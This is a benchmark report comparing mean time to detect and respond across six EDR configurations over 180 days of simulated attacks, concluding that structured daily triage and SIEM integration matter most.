Benchmark Study: MTTD and MTTR Across EDR Configurations in 180-Day Controlled Simulations
Benchmark study — mean time to detect and mean time to respond across different EDR alerting strategies, rule density configurations, and SIEM integration patterns, measured over 180 days of controlled adversary simulations.
This benchmark study ran controlled adversary simulations across six different EDR configurations over 180 days in Threatstealth-operated lab environments. The goal was to measure how configuration choices — alerting strategy, rule density, SIEM integration, and triage workflow — affect MTTD and MTTR independently of threat actor behaviour.
Configurations Tested
| Config | Alert strategy | Rule density | SIEM integration | Triage workflow |
|---|---|---|---|---|
| A (baseline) | Default vendor rules | Low | None | Ad-hoc |
| B | Default vendor rules | High | None | Ad-hoc |
| C | Default vendor rules | Low | Bidirectional | Ad-hoc |
| D | Default vendor rules | High | Bidirectional | Ad-hoc |
| E | Custom tuned rules | Medium | Bidirectional | Structured daily |
| F (optimised) | Custom tuned rules + LOLBAS | Medium | Bidirectional | Structured daily + automation |
MTTD Results
The most counter-intuitive finding: high rule density (Config B vs A) increased MTTD by 34%. More rules generate more alerts; more alerts create backlog; backlog delays triage; delayed triage increases MTTD. Alert volume is the enemy of MTTD — not detection coverage.
SIEM integration (Config C vs A) reduced MTTD by 28% independently of rule density, by providing correlation context that accelerated analyst triage decisions.
| Config | Median MTTD | vs. Baseline | Key factor |
|---|---|---|---|
| A (baseline) | 14.8 hours | — | Default rules, no SIEM, ad-hoc triage |
| B | 19.8 hours | +34% | High rule density overwhelms triage capacity |
| C | 10.7 hours | -28% | SIEM correlation reduces per-alert investigation time |
| D | 16.2 hours | +9% | SIEM benefit cancelled by high-density alert noise |
| E | 5.4 hours | -64% | Custom rules reduce noise; structured triage reduces queue |
| F (optimised) | 2.1 hours | -86% | Full optimisation: tuned rules + SIEM + structured triage + automation |
MTTR Results
MTTR was most strongly affected by SIEM integration and triage workflow structure. SIEM integration (bidirectional — EDR feeding SIEM and SIEM feeding EDR context back) reduced MTTR by 61% across all configurations where it was present. Structured daily triage reduced MTTR by an additional 39% beyond SIEM integration alone.
| Config | Median MTTR | vs. Baseline |
|---|---|---|
| A (baseline) | 8.4 days | — |
| B | 10.1 days | +20% |
| C | 3.3 days | -61% |
| D | 4.1 days | -51% |
| E | 1.9 days | -77% |
| F (optimised) | 0.7 days | -92% |
The Highest-Leverage Configuration Change
The single highest-leverage configuration change was not a new detection rule or a more expensive tool. It was structured alert triage: a defined daily window (30–60 minutes, morning) in which all critical and high alerts are reviewed in priority order with a defined disposition workflow.
Without structured triage, even well-tuned EDR configurations with SIEM integration left critical alerts unactioned for days. With structured triage, even the baseline configuration (Config A) improved MTTR by 43% compared to ad-hoc triage.
- Structured triage impact on MTTD: -39% vs. ad-hoc triage with same rules and SIEM
- Structured triage impact on MTTR: -43% vs. ad-hoc triage with same rules and SIEM
- Alert automation impact on MTTR: -28% vs. structured triage alone (auto-closing known false-positive patterns)
- Rule tuning impact on MTTD: -51% vs. default vendor rules at the same rule density
- Combined effect (Config F): -86% MTTD, -92% MTTR vs. baseline Config A
Recommendations
- Reduce rule density before adding new rules — remove or suppress any rule with >70% false-positive rate
- Implement SIEM bidirectional integration as the highest-priority infrastructure investment
- Establish structured daily triage before any other workflow change — it is the highest-leverage and lowest-cost intervention
- Prioritise LOLBAS and credential theft detection rules — highest-fidelity, lowest false-positive category in the benchmark
- Measure MTTD and MTTR per-configuration weekly — treat them as operational KPIs, not annual audit metrics